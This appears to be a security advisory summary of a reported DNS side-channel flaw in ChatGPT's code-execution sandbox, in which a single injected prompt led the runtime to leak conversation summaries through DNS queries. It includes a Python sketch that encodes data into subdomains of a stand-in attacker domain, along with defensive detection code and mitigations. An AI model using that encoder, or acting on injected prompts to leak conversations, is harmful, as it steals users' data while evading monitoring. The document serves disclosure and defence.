OpenAI — ChatGPT DNS side channel data exfiltration vulnerability
AI relevance: ChatGPT's code execution sandbox is a critical AI tooling surface: prompt injection can bypass its security controls, underscoring the need for robust runtime isolation and monitoring in AI agent systems.
- Check Point Research discovered a hidden DNS side channel in ChatGPT's code execution runtime environment
- The vulnerability allowed silent data exfiltration without user knowledge or consent
- Attackers could craft malicious prompts that triggered DNS queries containing conversation summaries
- The exfiltration occurred through the container used by ChatGPT for code execution and data analysis
- Researchers demonstrated that a single malicious prompt could activate the hidden channel
- The vulnerability was patched by OpenAI on March 30, 2026 after responsible disclosure
- This represents a novel class of AI supply chain attacks targeting runtime environments
- The attack bypassed traditional security monitoring focused on HTTP traffic
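To make the mechanism concrete, here is an illustrative sketch of how DNS side-channel exfiltration generally works: data is encoded into query subdomains, and any resolver that forwards the lookup leaks the payload to the attacker's authoritative nameserver. This is a generic technique sketch, not Check Point's actual proof of concept; the `evil.example` domain and helper function are hypothetical.

```python
import base64

MAX_LABEL = 63  # RFC 1035 caps each DNS label at 63 bytes


def encode_exfil_queries(data: bytes, attacker_domain: str = "evil.example") -> list[str]:
    """Illustrative only: split stolen data into base32 chunks that fit
    inside DNS labels. Resolving these names leaks the data to the
    attacker's nameserver even when all HTTP egress is blocked."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    # Prefix a sequence number so the receiver can reassemble the payload
    return [f"{i}.{chunk}.{attacker_domain}" for i, chunk in enumerate(chunks)]
```

Because the queries look like ordinary lookups and never touch an HTTP proxy, they evade monitoring that inspects only web traffic.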
Why it matters
This vulnerability demonstrates how AI tooling runtime environments can introduce hidden attack surfaces that traditional security monitoring misses. DNS-based exfiltration channels are particularly dangerous because they often bypass network security controls and logging, making them ideal for stealthy data theft from AI systems processing sensitive information.
What to do
- Monitor DNS queries from AI runtime environments for anomalous patterns and data exfiltration
- Implement runtime isolation for AI code execution with strict network egress controls
- Audit AI tooling supply chains for hidden channels and side effects
- Use DNS filtering and logging to detect data exfiltration attempts
- Apply the principle of least privilege to AI runtime environments
- Conduct regular security assessments of AI tooling infrastructure
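The first two recommendations above can be partially automated. A minimal detection sketch, assuming hypothetical thresholds that would need tuning against your environment's DNS baseline: flag queries whose labels are unusually long or high-entropy, a common signature of encoded exfiltration payloads.

```python
import math
from collections import Counter


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character in the string."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_suspicious(qname: str, max_label: int = 40, entropy_threshold: float = 3.5) -> bool:
    """Flag DNS queries with overly long or high-entropy labels.
    Thresholds here are illustrative, not production-tuned."""
    labels = qname.rstrip(".").split(".")
    return any(
        len(label) > max_label
        or (len(label) >= 16 and shannon_entropy(label) > entropy_threshold)
        for label in labels
    )
```

Running a check like this against resolver logs from AI runtime environments, combined with egress rules that restrict which resolvers the sandbox may reach, narrows the window for this class of side channel.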